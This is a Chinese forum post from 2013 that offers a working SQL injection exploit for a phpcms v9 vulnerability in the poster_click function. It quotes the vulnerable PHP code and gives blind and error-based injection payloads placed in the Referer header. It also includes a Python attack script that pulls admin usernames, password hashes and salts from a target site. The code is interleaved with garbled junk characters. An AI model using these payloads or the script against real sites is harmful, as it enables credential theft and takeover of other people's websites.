

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcms v9的0day,就随手写了个利用代码,其中注入代码有两种形式:

问题函数: \phpcms\modules\poster\index.php

8 ]9 \. x: q) [/ Ipublic function poster_click() {+ ]" N3 _, g! F  Q$ }. l4 m# i: X
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;5 k2 [: T* |8 C& n+ G# m! z$ y, ?, g
$r = $this->db->get_one(array('id'=>$id));
! z% A( N( U+ ~; R3 bif (!is_array($r) && empty($r)) return false;
8 g4 S% @( X# H0 T$ip_area = pc_base::load_sys_class('ip_area');
' n, W. B$ j- ?& i8 m; C" @, I$ip = ip();: u7 o  |, ]( ]( l% u- R; @* L: Y
$area = $ip_area->get($ip);
1 s% S$ a& k: u& g$username = param::get_cookie('username') ? param::get_cookie('username') : '';
! z! K2 y4 b! X$ Q" [  wif($id) {2 k; y8 _" }8 T# J" b, ], {6 Z
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
( D9 f" p6 v2 D$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
) g0 i% M' m) Y; Q# o! u3 o; c}" e# b" G4 L8 J1 k1 o
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$ x; v( v: }7 L2 j$setting = string2array($r['setting']);
, I: _9 m. L" B8 i: Gif (count($setting)==1) {
  m) a! Z9 \1 d0 S$url = $setting['1']['linkurl'];8 R& d( w; T  U5 |
} else {" u5 e. ?0 P7 t' j
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
9 c  f( r: _* U" Y0 h$ m# H7 B}8 s# k# L9 r" ^- K' j6 p
header('Location: '.$url);2 V' s3 M- w3 D  D- ?5 O/ `0 t
}


利用方式:

1、可以采用盲注入的手法:

referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#

根据返回页面是否正常,逐个猜解密码字段。

2、代码是花开写的,随手附上了:

, B8 A0 g, W. p1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

此方法是报错注入手法,原理自查。



利用程序:

) Y& O& r4 T2 `9 t4 ~#!/usr/bin/env python
( [6 V8 Y' `, ~import httplib,sys,re
8 }, I$ n+ k( @+ O2 r* \
& ~$ s' n2 m( L- c3 {8 j7 Rdef attack():
6 T0 H/ L/ x$ h$ q7 G8 ?print “Code by Pax.Mac Team conqu3r!”
- K' c' e, S5 t* e% S9 oprint “Welcome to our zone!!!”
+ |' X: Z' o% x( V; P# E& Surl=sys.argv[1]
1 h# Z" Y; p# N( N3 H" f) X8 ?paths=sys.argv[2]
8 I- u$ {$ D' ^8 [/ U4 P* Nconn = httplib.HTTPConnection(url)* U  s* M( `8 R+ z1 E
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
6 M1 E7 [- H% c) z) S“Accept”: “text/plain”,
1 ]0 Y1 W3 P3 {4 ?. @“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
  c8 P7 t7 r" B( N5 Yconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
6 f! \% p2 @* H! Wr1 = conn.getresponse()" o2 ]) M" d& L8 p% A. T
datas=r1.read()' T! e: P& M5 s4 _. E5 B
datas=re.findall(r”Duplicate entry \’\w+’”, datas)" b2 _) c) u: G8 c9 k
print datas[0]* N: D, J1 {- o5 X/ ^: L0 \! D
conn.close()) b+ S% o/ G, G4 ?3 U! _- w
if __name__==”__main__”:
8 e3 j( S% J1 ?  a' i- Yif len(sys.argv)<3:
7 C2 o" U$ n0 D# q+ _print “Code by Pax.Mac Team conqu3r”
2 P0 C& B$ |# H2 M( Xprint “Usgae:”
) U* {  t' z! k3 c# Eprint “    phpcmsattack.py   www.paxmac.org /”8 |0 x; Z$ n& l
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”8 m! p$ y, Y0 b
sys.exit(1)3 g! F8 g* g. z- L) l7 B, H
attack()+ G% U, z6 `( T! c* c7 M
/ ]/ `$ l) c( b: B  z) Q; w& p




